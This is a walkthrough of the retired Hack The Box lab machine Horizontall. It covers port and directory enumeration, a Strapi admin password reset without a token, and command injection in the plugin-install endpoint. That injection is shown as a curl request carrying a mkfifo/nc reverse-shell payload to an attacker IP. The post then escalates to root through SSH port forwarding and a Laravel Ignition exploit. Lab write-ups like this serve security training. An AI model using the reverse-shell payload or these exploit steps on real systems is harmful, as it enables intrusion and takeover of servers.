Horizontall: Hack The Box Walkthrough
source link: https://hackso.me/horizontall-htb-walkthrough/
This post documents the complete walkthrough of Horizontall, a retired vulnerable VM created by wail99, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
Background
Horizontall is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan probe to establish the open ports on the host.
masscan -e tun0 -p1-65535,U:1-65535 10.10.11.105 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-08-30 04:26:35 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.11.105
Discovered open port 22/tcp on 10.10.11.105
Nothing unusual. Let’s do one better with nmap, scanning the discovered ports to establish their services.
nmap -n -v -Pn -p22,80 -A --reason 10.10.11.105 -oN nmap.txt
...
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
I’d better map horizontall.htb to 10.10.11.105 in /etc/hosts. This is what the site looks like.
I’m guessing HT refers to Horizontall.
Directory/File Enumeration
Let’s see what we can glean from gobuster and SecLists for a start.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -e -t 20 -x php,htm,html,txt -u http://horizontall.htb/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://horizontall.htb/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,txt,php,htm
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/08/30 06:24:57 Starting gobuster in directory enumeration mode
===============================================================
http://horizontall.htb/js (Status: 301) [Size: 194] [--> http://horizontall.htb/js/]
http://horizontall.htb/css (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
http://horizontall.htb/img (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
http://horizontall.htb/index.html (Status: 200) [Size: 901]
===============================================================
2021/08/30 06:26:09 Finished
===============================================================
That’s not much to go on. We need more information.
Burp Suite - Site Map
Suppose we reload the site through Burp Suite. The site map turns up a second hostname, api-prod.horizontall.htb, which I’d better add to /etc/hosts as well. A simple curl against it reveals more.
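The site map surfaced the second hostname because the front-end JavaScript embeds it. Below is an added example, written for this walkthrough and not part of the original post, that harvests every name under the target domain from a blob of JavaScript and turns the result into an /etc/hosts line; the JavaScript sample is constructed for the demonstration, not copied from the site, and the domain and IP are the ones from the scan above.

```python
#!/usr/bin/env python3
"""Harvest hostnames under the target domain from front-end JavaScript and
turn them into an /etc/hosts line.

Example code written for this walkthrough, not the original post's. The
JavaScript below is constructed for the demonstration, not copied from the
site; the IP is the target's from the scan."""
import re
import sys

TARGET_IP = "10.10.11.105"

SAMPLE_JS = (
    'var e="http://api-prod.horizontall.htb";'
    'fetch(e+"/reviews").then(function(r){return r.json()});'
    'document.title="horizontall.htb";'
    # a lookalike under another domain, which must not be picked up:
    'var x="api-prod.horizontall.htb.example.net";'
)


def hostnames_in(text, domain):
    """Every hostname that is `domain` or a subdomain of it, lowercased and
    deduplicated. The lookarounds stop `foo.domain.example.net` and
    `notdomain` from matching."""
    pattern = re.compile(
        r"(?<![\w.-])((?:[a-z0-9-]+\.)*" + re.escape(domain) + r")(?![\w.-])",
        re.IGNORECASE)
    return sorted({m.lower() for m in pattern.findall(text)})


def hosts_line(ip, names):
    """One /etc/hosts entry covering every discovered name."""
    return "%s %s" % (ip, " ".join(names))


if __name__ == "__main__":
    # usage: script.py horizontall.htb app.js [more.js ...]
    domain = sys.argv[1] if len(sys.argv) > 1 else "horizontall.htb"
    files = sys.argv[2:]
    blob = ("".join(open(f, errors="replace").read() for f in files)
            if files else SAMPLE_JS)
    print(hosts_line(TARGET_IP, hostnames_in(blob, domain)))
```

Run it over the JavaScript files saved from Burp’s site map (or any downloaded bundle) and append the printed line to /etc/hosts; the lookarounds keep lookalike names under other domains out of the result.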
I wonder what Strapi is…
Strapi Framework Vulnerable to Remote Code Execution
In any case, let’s run ffuf on api-prod.horizontall.htb and see what we get.
ffuf -u http://api-prod.horizontall.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://api-prod.horizontall.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
Admin [Status: 200, Size: 854, Words: 98, Lines: 17]
ADMIN [Status: 200, Size: 854, Words: 98, Lines: 17]
admin [Status: 200, Size: 854, Words: 98, Lines: 17]
favicon.ico [Status: 200, Size: 1150, Words: 4, Lines: 1]
index.html [Status: 200, Size: 413, Words: 76, Lines: 20]
robots.txt [Status: 200, Size: 121, Words: 19, Lines: 4]
reviews [Status: 200, Size: 507, Words: 21, Lines: 1]
users [Status: 403, Size: 60, Words: 1, Lines: 1]
I had Burp Suite on the entire time, and when I saw the following response on browsing to http://api-prod.horizontall.htb/admin, I knew I’d struck gold.
A quick Google search on “strapi rce” led me to this article. In short, Strapi 3.0.0-beta.17.7 or earlier is vulnerable to authenticated RCE (CVE-2019-19609: the plugin name sent to the admin panel’s plugin install and uninstall endpoints is passed to a shell without sanitisation), and we have a 3.0.0-beta.17.4 on our hands.
Strapi Password Reset
Now, how can we get our hands on a password for remote code execution? Well, we don’t need one. There’s another vulnerability (CVE-2019-18818) that allows us to reset a Strapi administrator password without a reset token: the affected releases don’t check the type of the code field in the reset request, so an empty object in place of the token string gets through. Armed with this insight, all we need to reset the password is a POST request like so.
What’s really important is the JWT in the response: it’s the credential the admin API expects in the Authorization header for the plugin-install request that follows.
Foothold
Now that we have a valid JWT, getting foothold is easy.
curl -i \
-s \
-k \
-X $'POST' \
-H $'Authorization: Bearer [jwt]' \
-H $'Content-Type: application/json' \
-H $'Connection: close' \
--data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.17.134 1234 >/tmp/f)\",\"port\":\"1337\"}' \
$'http://api-prod.horizontall.htb/admin/plugins/install'
The file user.txt is in developer’s home directory.
Privilege Escalation
During enumeration from strapi’s account, I notice a port (8000/tcp) listening on localhost only.
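A loopback-only listener like this never shows up in an external scan, so it has to be found from inside. The script below is an added example written for this walkthrough, not the original post’s: it reads /proc/net/tcp directly (useful when ss and netstat are missing), decodes the kernel’s hex addresses, keeps only sockets in LISTEN state and singles out those bound to 127.0.0.0/8. The table embedded in it is constructed to resemble the box (22 and 80 on every interface, 1337 and 8000 on loopback only), not copied from the target; the user and host in the forwarding hint are assumptions.

```python
#!/usr/bin/env python3
"""List TCP listeners from /proc/net/tcp and single out the ones bound to
loopback, which is how a port like 8000/tcp shows up during post-exploitation
enumeration when ss/netstat are not around.

Example code written for this walkthrough, not the original post's. The
table below is constructed to resemble the situation on the box (22 and 80
on every interface, 1337 and 8000 on 127.0.0.1 only); it was not copied from
the target. IPv4 only: /proc/net/tcp6 uses a wider address format."""
import socket
import struct

LISTEN = "0A"   # value of the `st` column for a listening TCP socket

SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18223 1 0000000000000000 100 0 0 10 0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 19877 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0539 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1001        0 21034 1 0000000000000000 100 0 0 10 0
   3: 0100007F:1F40 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1002        0 21035 1 0000000000000000 100 0 0 10 0
   4: 690B0A0A:0016 86110A0A:D4F2 01 00000000:00000000 02:000A8F1C 00000000     0        0 22410 2 0000000000000000 20 4 31 10 -1
"""


def hex_to_ipv4(word):
    """The kernel prints the address as a host-order 32-bit integer, so on
    little-endian hardware the bytes come out reversed: 0100007F is 127.0.0.1."""
    return socket.inet_ntoa(struct.pack("<I", int(word, 16)))


def parse_proc_net_tcp(text):
    """Return (local_ip, local_port, state, uid) for every socket row."""
    rows = []
    for line in text.splitlines()[1:]:          # first line is the column header
        fields = line.split()
        if len(fields) < 8:
            continue
        ip_hex, port_hex = fields[1].split(":")
        rows.append((hex_to_ipv4(ip_hex), int(port_hex, 16), fields[3], int(fields[7])))
    return rows


def listeners(text):
    """Listening sockets only, as (ip, port, uid)."""
    return [(ip, port, uid) for ip, port, state, uid in parse_proc_net_tcp(text)
            if state == LISTEN]


def loopback_only(text):
    """Listeners no external scan can see; each is a candidate for ssh -L."""
    return sorted(row for row in listeners(text) if row[0].startswith("127."))


def forward_hint(row, jump_user_host):
    """The local-forward command that would expose one such listener."""
    ip, port, _uid = row
    return "ssh -L %d:%s:%d %s" % (port, ip, port, jump_user_host)


if __name__ == "__main__":
    try:
        with open("/proc/net/tcp") as fh:
            table = fh.read()
    except OSError:
        table = SAMPLE_PROC_NET_TCP          # fall back to the constructed sample
    for row in loopback_only(table):
        print("%s:%d (uid %d)  ->  %s" % (row + (forward_hint(row, "strapi@10.10.11.105"),)))
```

The uid column is worth reading alongside the port: a listener owned by a different account than the one you landed in is a hint that the service behind it is a separate privilege boundary, which is exactly what 8000/tcp turns out to be here.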
I can easily inject an SSH key I control into /opt/strapi/.ssh/authorized_keys to 1) get a more stable shell, and 2) perform local port forwarding like so.
ssh -L 8000:127.0.0.1:8000 -i strapi strapi@10.10.11.105
Laravel
So, Laravel is running at 8000/tcp.
CVE-2021-3129 - Unauthenticated RCE in Ignition before 2.5.2 used in Laravel
We are looking at CVE-2021-3129. The bug is only reachable when Laravel runs with debug mode on (APP_DEBUG=true), which is what exposes Ignition’s solution-execution endpoint, so the Ignition error page is the tell to look for. There are plenty of exploits for CVE-2021-3129 on GitHub and I’ve chosen the one that appears to be the most straightforward.
I have a shell over at my attacking terminal, a root shell no less.
Armed with a root shell, it’s trivial to retrieve root.txt.